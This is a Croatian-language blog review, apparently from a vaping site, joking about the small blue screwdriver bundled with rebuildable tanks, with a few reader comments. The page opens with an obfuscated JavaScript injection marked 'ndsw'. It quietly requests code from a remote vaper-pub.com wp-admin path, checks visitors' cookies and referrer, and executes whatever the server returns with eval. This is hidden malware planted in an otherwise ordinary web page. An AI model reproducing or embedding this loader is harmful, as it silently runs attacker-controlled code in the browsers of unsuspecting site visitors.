;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Mali plavi šarafciger

Mali plavi šarafciger

Šarafciger ili kacavida, kacavida ili odvijač, odvijač ili izvijač – vrsta je ručnog alata koji služi za zavijanje i odvijanje vijaka. Uglavnom se sastoji od metalnog dijela koji dolazi u kontakt s vijcima te plastičnog i/ili gumiranog dijela koji omogućava bolje držanje u ruci (“grip”, op.a.).

Ima ih više vrsta, a svoje “nazive” uglavnom duguju istoimenim vijcima/šarafima/vidama tj. njihovim oblicima.
Neki od najpopularnijih tipova u vape svijetu su:

 • običan, ravni (tzv. “slot”) – ujedno, kažu, najstariji tip vijka
 • križni (tzv. “Phillips” ili “Phillips screw”) – nazvan po biznismenu Henry F. Phillips-u koji je otkupio originalni patent izumitelja John P. Thompsona te vijku unaprijedio dizajn
 • šesterokutni (tzv. “imbus”, “hex” ili “Allen screw”) – patentiran početkom 20. stoljeća od strane William G. Allen-a (hence the name) iako ideja za isti postoji još od sredine 19. stoljeća
 • zvjezdasti (tzv. “Torx”) – u obliku je šesterokrake zvijezde, osmišljen i patentiran od strane Camcar Textron korporacije

Napomena: većina navedenih ima i nekoliko svojih podtipova/varijacija.

No, vratimo se mi na malog plavog (ne na Modrića).
Svatko je, bar jednom, kupivši neki tank za samoizradu grijača (RTA, rebuildable tank atomizer) – u paketu, osim zamjenskih gumica, rezervnog stakla i šarafića, sigurno dobio i ovaj mali alatić – vrlo vjerojatno najpopularniji “bonus” svakog boljeg vape mail-a iz mile nam Narodne Republike Kine.

Neki od vas ih do sad imaju bar desetak, a neki mogu otvoriti i mini trgovinu samo sa tim jednim alatom u ponudi. Priča se čak i da su neki počeli pariti samo kako bi skupljali te šarafcigere (da, fora je sa prastarog memea – so sue me). Bilo kako bilo, ako se iole smatrate nekim prosječnim vape entuzijastom – koristili ste ga bar jednom u životu i u tom trenutku vam se činio kao najbolja i najpraktičnija mala stvar u svemiru najboljih i najpraktičnijih malih stvari – u svemiru.

Tako mali, a tako potentan i koristan (that’s what she said).

Tehnički podaci

 • ukupna duljina – cca 4.5cm (ili varira između 4 i 5cm)
 • tip navoja na osovini – najčešći su imbus, obični ravni ili križni
 • boja drške – well, Mr. Obvious – plava (iako je nekad i crne boje, ako ulovite jackpot)
 • materijal drške – nekakva plastika (možda i ne želimo znati)
 • debljina drške – nije neka sreća, oko pola centimetra, možda malo više – al’ ajmo reć’: služi svrsi
 • materijal osovine – nehrđajući čelik/stainless steel (ili ako nemate sreće – pitajboga kakva “kineska” mekša legura metala koja će vam se razlohati nakon par korištenja)
 • promjer “osovine” – 1.5 do 2mm (nekad, ali rijetko preko 2mm – bar što se tiče ovih koji dolaze s vape tankovima)

Pozitivno

 • dobro ga je imati
 • dobro ih je imati više vrsta
 • ako ga zagubite, imate negdje drugi
 • ako ga ne zagubite – imate ga
 • stane u svaku kutijicu
 • može poslužiti za motanje microcoilova (ako vam odgovara tako mali promjer pošto se većinom mota od 2.5mm naviše i ako imate jako male ručice)

Negativno

 • kod nekih primjeraka se odvaja drška od osovine ako naletite na neki “zapečeniji” vijak (osobno nisam naletio na takav – još, ali eto – Viktor je, pa sam to uvalio u recenziju)
 • moguće je da vas zalomi neki od neke mekše legure metala pa se lako “razloha” u kratkom roku (što sam već spomeuo gore)
 • ne mogu se njime čačkati zubi, uši možete – ali nemojte, a ako baš baš morate – koristite dršku
 • lako se zagubi
 • kad (i ako) ga nađete, nije ugodan za golo stopalo (LeGo moment)

Zaključak

Svaki šaraf bi ga za šarafciger htio. Svaka vida za kacavidu. Svaki vijak za odvijač (odvijak?)…

Choose your Reaction!
  • nije, ali smo Karlo i ja nešto pričali da bi fakat trebali jednom, kad će nam biti jako, ali baš jako dosadno, povaditi iz svih ladica i kutija te šarafcigere koje smo dobili s vape opremom otkad vejpamo :D pa da vidimo koliko toga u biti imamo (bez natjecanja) :)

 • hahah neki dan sam si mislil da ih sve stavim na kup, ali moram u podrum još po starim kutijama potražiti gdi se nalazi još milijon njih :D

  • da, bilo bi fora to sve skupiti iz raznih ladica i ormara – ja koji nemam ni 5% opreme koju ti imaš ih imam sigurno bar 15ak skupa s T-šarafcigerima :)

Leave a Comment